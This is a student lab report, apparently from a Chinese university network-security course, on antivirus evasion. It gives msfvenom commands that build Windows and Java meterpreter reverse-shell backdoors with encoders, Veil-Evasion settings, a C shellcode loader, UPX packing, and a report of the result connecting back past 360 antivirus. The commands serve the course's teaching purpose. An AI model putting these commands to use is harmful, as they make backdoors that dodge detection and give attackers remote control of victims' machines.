• 2019-2020-2 20175325石淦铭《网络对抗技术》Exp3 免杀原理与实践


    2019-2020-2 20175325石淦铭《网络对抗技术》Exp3 免杀原理与实践


    目录:

    • 基础知识
    • 实验内容
    • 实验感想

    基础知识:

    (1)杀软是如何检测出恶意代码的?

    • 基于特征码的检测:可执行文件包含特征码库中的某段数据就会被认为是恶意代码。
    • 启发式恶意软件检测:一个软件在干通常是恶意软件干的事,看起来了像个恶意软件,就把它当成一个恶意软件。
    • 基于行为的恶意软件检测:根据程序有什么行为来判断他是好是坏。

    (2)免杀是做什么?

    • 木马或恶意程序、软件避免被杀毒软件或管理员发现并删除。

    (3)免杀的基本方法有哪些?

    • 改变特征码:对于exe可以加壳,对于shellcode可以用encode编码、基于payload重编译,对于源代码可以用其他语言重写。
    • 伪装,防止被行为查杀,使用隧道技术
    • 减少对系统的修改

    (4)开启杀软能绝对防止电脑中恶意代码吗?

    • 开启杀软并不能绝对防止电脑中恶意代码,有些恶意代码并不能被检测出,但是日常生活中的病毒可以降低电脑中恶意代码的概率,但是安装一个靠谱杀软真的太重要了。

    实验内容:

    一、使用msf生成后门程序的检测并生成如jar之类的其他文件

    1、将上次实验生成的后门程序放到virscan上,我们可以看到扫描的结果:

    2、利用msfvenom对后门进行编码处理(进行编码十次): msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘x00’ LHOST=192.168.216.132 LPORT=5325 -f exe > fyhtvxq.exe

    3、将生成的文件放到网站上再次进行扫描,扫描结果如下:

    4、无论编码多少次结果都是一样,所以想要利用编码次数来达到免杀效果是不行的。

    5、msf生成jar文件msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.216.132 LPORT=5325 x> backdoor.jar并将生成的为文件进行扫描

    二、Veil-Evasion

    1、安装Veil-Evasion

    2、使用veil-evasion输入指令use Evasion

    3、输入指令list

    4、输入下面的指令设置veil:

    use 7
    set LHOST 192.168.216.132
    set LPORT 5325
    

    5、输入generate生成payload,名字设为payload5325

    6、扫描结果如下:

    三、使用C + shellcode编程

    1、首先使用msfvenom生成shellcode数组msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.216.132 LPORT=5325 -f c

    2、然后使用gedit用编写c语言恶意代码5325met-CrossCompling.c

    unsigned char buf[]= //省略的shellcode数组具体内容
    int main()
    {
        int (*func)()=(int(*)())buf;
        func();
    }
    

    3、最后使用mingw-w64将c语言文件生成exe文件:i686-w64-mingw32-g++ 5228met-CrossCompling.c -o 5325met-CrossCompling.exe

    4、对该.exe文件 进行检测

    四、加壳工具

    1、该指令加壳的命令格式:upx #需要加壳的文件名 -o #加壳后的文件名
    2、输入指令:upx 5325met-CrossCompling.exe -o 5325.upxed.exe

    3、进行扫描看结果

    五、使用其他课堂未介绍方法

    • 1、生成shellcodemsfvenom -p windows/meterpreter/reverse_https -e x86/xor_dynamic -i 5 -b 'x00' lhost=192.168.216.132 lport=5325 -f c -o shell.c
      2、c+shellcode用codeblocks编译,生成.exe后进行扫描

    • 拷贝在Windows下软件查杀

      结果很意外,感觉360不是很靠谱

    六、通过组合应用各种技术实现恶意代码免杀

    1、运用压缩壳+上面的C+shellcode进行扫描

    2、使用不同编码器:msfvenom -p windows/meterpreter/reverse_https -e x86/bloxor LHOST=192.168.216.132 -f c命令生成的shellcode数组拷贝到c文件中扫描结果如下

    七、用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

    • 系统:win10

    • 杀软:360杀毒

    • 与本机杀软共生

    • 回连成功:


    实验感想:

    通过此次实验,对于网络安全的问题有了更深的体会,在安装各个程序的时候会出现问题,而且有些刚从虚拟机拖出来就被360杀了,收获多多。在当今社会,我们要时时刻刻提高安全防范意识,定期检查自己的电脑,防止别人恶意盗取利用自己的信息。

  • 相关阅读:
    SQL SERVER CXPACKET-Parallelism Wait Type 的惯用解决方案
    服务器主体 "sa" 无法在当前安全上下文下访问数据库 XXX[SQLSTATE 08004] (错误 916). 该步骤失败。
    Android 使用 aapt 命令查看 apk 包名
    Android数据库GreenDao的使用总结
    NestedScrollView、ScrollView 加载完自动滑动至底部问题的解决方案
    Android框架式编程之Retrofit
    Visual Studio 开发(三):Visual Studio 使用时常见问题解决方案
    Android 网络交互之移动端与服务端的加密处理
    Android框架式编程之ViewModel
    Android框架式编程之LiveData
  • 原文地址:https://www.cnblogs.com/sgm5/p/12620019.html
Copyright © 2020-2023  润新知